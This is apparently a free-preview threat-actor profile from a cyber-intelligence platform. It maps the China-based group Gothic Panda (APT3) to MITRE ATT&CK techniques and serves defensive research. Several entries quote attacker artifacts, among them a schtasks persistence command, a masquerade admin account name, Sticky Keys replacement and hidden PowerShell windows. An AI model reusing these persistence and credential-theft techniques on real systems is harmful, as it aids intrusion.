3C-INT logo [Cyber]Crime Characterization for Intelligence FREE PREVIEW
You are exploring the Free preview. To unlock full read-only access to all public profiles and in-app notifications, create a free research account. For analyst / premium plans capabilities (editing, advanced tabs, exports), please contact us

Threat Actor Characterization

Back
You’re viewing the read-only version. Sign in for analyst tools (editors, promote draft, file/relations management, etc.)
Gothic Panda

Gothic Panda

ID: 2b7485179e18c60ca83d336bb97f5dba31027
Cybercrime State-Sponsored
Threat types: Intrusion, Malware, Espionage
China
Updated: 2026-01-13
Created: 2025-10-20
Progress: 40% Completeness: 36% Freshness: 50%
Operation zone:
Aliases Limited alias preview
APT3 Buckeye P**** TG*****
Th*************** UP******
Showing 2 of 6 aliases in free preview.
Actor Network Graph
Open Network Graph
Read-only preview for anonymous visitors. Sign in with a free Research account for full workspace.
MITRE ATT&CK®
confidence: medium
Actor Techniques page ATT&CK® Diagram

Gothic Panda is a China-based threat group that researchers have attributed to China's Ministry of State Security. This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. Ref: https://attack.mitre.org/groups/G0022/


Technique Technique name Tactics Evidence
T1003.001 LSASS Memory TA0006
  • OS Credential Dumping: LSASS Memory - Gothic Panda has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument "dig." · ref
T1021.001 Remote Desktop Protocol TA0008
  • Remote Services: Remote Desktop Protocol - Gothic Panda enables the Remote Desktop Protocol for persistence. Gothic Panda has also interacted with compromised systems to browse and copy files through RDP sessions. · ref
T1021.002 SMB/Windows Admin Shares TA0008
  • Remote Services: SMB/Windows Admin Shares - Gothic Panda will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement. · ref
T1027.002 Software Packing TA0005
  • Software Packing - Gothic Panda has been known to pack their tools. · ref
T1027.005 Indicator Removal from Tools TA0005
  • Indicator Removal from Tools - Gothic Panda has been known to remove indicators of compromise from tools. · ref
T1036.010 Masquerade Account Name TA0005
  • Masquerading: Masquerade Account Name - Gothic Panda has been known to create or enable accounts, such as support_388945a0. · ref
T1053.005 Scheduled Task TA0002 TA0003 TA0004
  • Scheduled Task/Job: Scheduled Task - An Gothic Panda downloader creates persistence by creating the following scheduled task: schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System". · ref
T1056.001 Keylogging TA0006 TA0009
  • Input Capture: Keylogging - Gothic Panda has used a keylogging tool that records keystrokes in encrypted files. · ref
T1059.001 PowerShell TA0002
  • Command and Scripting Interpreter: PowerShell - Gothic Panda has used PowerShell on victim systems to download and run payloads after exploitation. · ref
T1059.003 Windows Command Shell TA0002
  • Command and Scripting Interpreter: Windows Command Shell - An Gothic Panda downloader uses the Windows command "cmd.exe" /C whoami. The group also uses a tool to execute commands on remote computers. · ref
T1070.004 File Deletion TA0005
  • Indicator Removal: File Deletion - Gothic Panda has a tool that can delete files. · ref
T1074.001 Local Data Staging TA0009
  • Data Staged: Local Data Staging - Gothic Panda has been known to stage files for exfiltration in a single location. · ref
T1078.002 Domain Accounts TA0001 TA0003 TA0004 TA0005
  • Valid Accounts: Domain Accounts - Gothic Panda leverages valid accounts after gaining credentials for use within the victim domain. · ref
T1087.001 Local Account TA0007
  • Account Discovery: Local Account - Gothic Panda has used a tool that can obtain info about local and global group users, power users, and administrators. · ref
T1090.002 External Proxy TA0011
  • Proxy: External Proxy - An Gothic Panda downloader establishes SOCKS5 connections for its initial C2. · ref
T1098.007 Additional Local or Domain Groups TA0003 TA0004
  • Account Manipulation: Additional Local or Domain Groups - Gothic Panda has been known to add created accounts to local admin groups to maintain elevated access. · ref
T1110.002 Password Cracking TA0006
  • Brute Force: Password Cracking - Gothic Panda has been known to brute force password hashes to be able to leverage plain text credentials. · ref
T1136.001 Local Account TA0003
  • Create Account: Local Account - Gothic Panda has been known to create or enable accounts, such as support_388945a0. · ref
T1204.001 Malicious Link TA0002
  • User Execution: Malicious Link - Gothic Panda has lured victims into clicking malicious links delivered through spearphishing. · ref
T1218.011 Rundll32 TA0005
  • System Binary Proxy Execution: Rundll32 - Gothic Panda has a tool that can run DLLs. · ref
T1543.003 Windows Service TA0003 TA0004
  • Create or Modify System Process: Windows Service - Gothic Panda has a tool that creates a new service for persistence. · ref
T1546.008 Accessibility Features TA0003 TA0004
  • Event Triggered Execution: Accessibility Features - Gothic Panda replaces the Sticky Keys binary C:\Windows\System32\sethc.exe for persistence. · ref
T1547.001 Registry Run Keys / Startup Folder TA0003 TA0004
  • Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - Gothic Panda places scripts in the startup folder for persistence. · ref
T1552.001 Credentials In Files TA0006
  • Unsecured Credentials: Credentials In Files - Gothic Panda has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome. · ref
T1555.003 Credentials from Web Browsers TA0006
  • Credentials from Password Stores: Credentials from Web Browsers - Gothic Panda has used tools to dump passwords from browsers. · ref
T1560.001 Archive via Utility TA0009
  • Archive Collected Data: Archive via Utility - Gothic Panda has used tools to compress data before exfilling it. · ref
T1564.003 Hidden Window TA0005
  • Hide Artifacts: Hidden Window - Gothic Panda has been known to use -WindowStyle Hidden to conceal PowerShell windows. · ref
T1566.002 Spearphishing Link TA0001
  • Phishing: Spearphishing Link - Gothic Panda has sent spearphishing emails containing malicious links. · ref
T1574.001 DLL TA0003 TA0004 TA0005
  • Hijack Execution Flow: DLL - Gothic Panda has been known to side load DLLs with a valid version of Chrome with one of their tools. · ref
Strategic Intelligence
Limited preview
No content.
Full strategic intelligence is available in Analyst and Premium plans.
Executive Analyst Brief for CISO
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Executive brief now
Saved successfully.
Hunting Playbook
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Hunting Playbook now
Saved successfully.
IOC Appendix
Empty Limited preview
No content yet.
IOC Appendix now
Saved successfully.
OSINT Library
Empty Limited preview
No content yet.
OSINT Library now
Saved successfully.
Social Medial & Communication
SOCMINT integrated: 0/0
No social links registered for this profile.
Notes: preview mode hides sensitive social/contact details.
Reference Images/Associated Evidence Limited
No images found for this threat.